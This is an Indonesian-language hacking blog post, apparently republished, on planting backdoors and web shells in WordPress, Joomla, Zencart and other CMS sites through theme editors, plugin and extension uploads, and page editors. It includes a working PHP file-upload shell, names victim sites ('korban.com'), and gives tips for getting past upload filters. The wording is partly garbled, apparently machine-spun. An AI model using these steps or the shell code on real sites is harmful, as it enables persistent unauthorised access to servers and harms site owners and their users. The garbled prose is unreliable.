Cara Mencari Shell Yang Sudah Ditanam
Padalah inti puas posting kali ini adalah kita akan membincangkan
Bagaimana Cara Menanam Backdoor / Shell Di Bervariasi Macam CMS
WordPress :
1.
Theme-editor
Pergi ke appearance –> editor –> klik blabla.php –> ganti dengan script shell –> save –> pergi ke themes –> klik kanan sreg theme yang dipake –> Open Image Location –> ganti /screenshot.png dgn blablabla.php tadi
[ex :
www.sandy-x207.com/wp-content/themes/twentyten/single.php
]
2.
Upload plugin
Sisipkan shell plong folder plugin [ex : akismet] lalu masukan foldernya ke zip
Pergi ke plugins –> add plugins –> upload
[akses shellnya di :
www.sandy-x207.com/wp-content/plugins/lumaho/guataulumaho.php
]
ket : lumaho itu merek folder, guataulumaho.php itu merek shell yang tadi sudah disisipkan
Joomla
:
1.
Install extention
:
Pergi ke extentions –> Install / Uninstall –> Upload –> jemah ada bacaan error, cuekin aja
[akses :
www.sandy-x207.com/tmp/shell.php
]
2.
Template manager
:
Menjauhi ke extentions –> klik template manager –> memperbedakan –> edit html –>
ubah dengan script shell –> save
[akses : alamatnya teragendakan disitu]
3.
NinjaXplorer
–
Download pluginsINI
– Install dulu Extentions –> Install / Uninstall –> upload
– Sekiranya sudah selesai, arahkan tab ke Components. Padalah udah ke install kan Plugins yg tadi kita Upload, Lebih lanjut masuk ke directory Plugins NinjaXplorer Tampilannya seperti ini :
– Sehabis diupload, shell rata-rata berada di
http://www.korban.com/news/backdoor.php
atau
http://www.target.com/backdoor.php
Zencart
:
– Login ke page admin
– masuk ke file dimana kita bisa menyunting filefile [
http://site/path/admin/define_pages_editor.php]
– memperbedakan plain text, dan pilih riuk satu file nan mau kita edit dan masukkan script uploader maupun shell kalian
<?php
echo
‘<b>Jundab<br><br>’.php_uname().'<br></b>’;
echo
‘<form action=”” method=”post” enctype=”multipart/form-data”
name=”uploader” id=”uploader”>’;
echo
‘<input type=”file” name=”file” size=”50″>
<input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’;
if( $_POST[‘_upl’] == “Upload”
) {
if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’]))
{ echo
‘<b>Upload Success !!!</b><br><br>’; }
else
{ echo
‘<b>Upload Fail !!!</b><br><br>’; }
}
?>
– timbrung ke file nan kalian pilih tadi melewati index.php
index.php?main_page=$file
– contoh jikalau kalian mengidas contact_us maka ikut ke file tersebut sebagai berikut :
index.php?main_page=contact_us
– Lain semua zencart bisa di edit filenya, karna sudah diberikan perm .
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir berpunca path website tersebut di .htaccess atau diberikan permission 😉
Cms lain
:
1. Cari fitur upload
[sungguhpun dilarang upload .php tapi dicoba aja lewat, banyak mengapa web yang bakir gitu :D]
2. Tamper Data
Sekian tutorial berpangkal saya
Source: https://worldcyberhacker.blogspot.com/2014/12/cara-menanam-backdoor-shell-di-berbagai.html
Posted by: holymayhem.com